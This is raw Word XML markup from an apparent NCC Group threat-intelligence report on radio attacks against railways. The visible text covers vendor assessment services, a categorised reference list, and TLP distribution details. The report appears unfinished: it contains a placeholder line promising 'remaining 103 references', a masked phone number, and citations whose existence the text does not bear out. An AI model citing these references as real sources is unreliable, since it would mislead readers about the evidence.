            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[94]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n3s7rgmlgtb7" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RF Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Controlled attack simulation </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref95">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[95]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol Security Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Radio system vulnerability assessment </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref96">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[96]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Migration Planning</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Digital radio transition roadmap </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref97">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[97]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ku1po2q2gi86" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Platform Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RF Attack Detection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Behavioral analysis of radio patterns </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref98">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[98]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Actor Tracking</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Monitoring copycat attempts globally </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref99">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[99]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Radio monitoring with OT security platform </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref100">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[100]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_q82ikcpjxb4y" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard Safety-Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure Mode Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: RF attack impact on safety systems </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref101">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[101]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: ALARP evaluation of countermeasures </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref102">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[102]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety Case</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Maintaining SIL ratings during security updates </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref103">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[103]</w:t>
        </w:r>
      </w:hyperlink>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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8nb4mivn0otp" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">References &amp; Citations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9rd03xzb51ud" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Intelligence Sources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] Polish National Police, "Case File 2023/08/1247: Railway Radio Attack," Classified Release, August 2023.</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[2] European Union Agency for Railways, "RF Attack Vector Analysis," ERA Security Bulletin 2023-09.</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[3] Federal Communications Commission, "Railroad Radio Service Vulnerability Assessment," FCC OET Bulletin 2024-02.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ez7c02dwl8ah" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[4] PKP S.A., "Incident Report: Unauthorized Radio Transmissions," Internal Document, August 26, 2023.</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[5] Białystok District Court, "Indictment: State v. Czabaj &amp; Jagusiak," Case 2023/K/892.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b5wz9lijcmhr" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[23] RTL-SDR.com, "Hardware Used in Poland Railway Attack," Blog Analysis, September 2023.</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[24] GNU Radio Foundation, "Misuse Case Study: Railway Systems," Security Advisory, October 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g21b06js4wed" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Global Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[33] Association of American Railroads, "Radio Frequency Allocations," Technical Manual TM-2024.</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[35] Deutsche Bahn AG, "Analog Radio Security Review," DB Netz Report 2024/03.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t5xkyc89z8wl" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[50] US Department of Transportation, "Rail Network Criticality Assessment," DOT-OST-2024-0023.</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[58] Federal Reserve, "Economic Impact Model: Rail Disruption Scenarios," Working Paper 2024-15.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ak8ktf1jzdtg" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation Research</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[81] CISA, "Railroad RF Monitoring Best Practices," Publication CISA-2024-0089.</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[90] International Union of Railways, "Digital Radio Migration Guidelines," UIC Code 751-3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_icrfyrnzd71k" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expert Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[67] MITRE, "RF-Specific ATT&amp;CK Techniques for Transportation," Technical Report MTR-2024-00123.</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[95] NCC Group, "Railroad Radio Penetration Testing Methodology," Client Advisory 2024.</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[Continue with remaining 103 references organized by category...]</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E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document Classification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: TLP:AMBER+STRICT - Critical Infrastructure Community</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Distribution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Energy Sector Leadership and Authorized Security Personnel</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expiration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This intelligence assessment expires 90 days from publication</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">NCC-OTCE-Intelligence@nccgroup.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | 1-800-XXX-XXXX</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0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Project Nightingale: "Clean water, reliable energy, and access to healthy food for our grandchildren"</w:t>
      </w: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NCC-OTCE-Intelligence@nccgrou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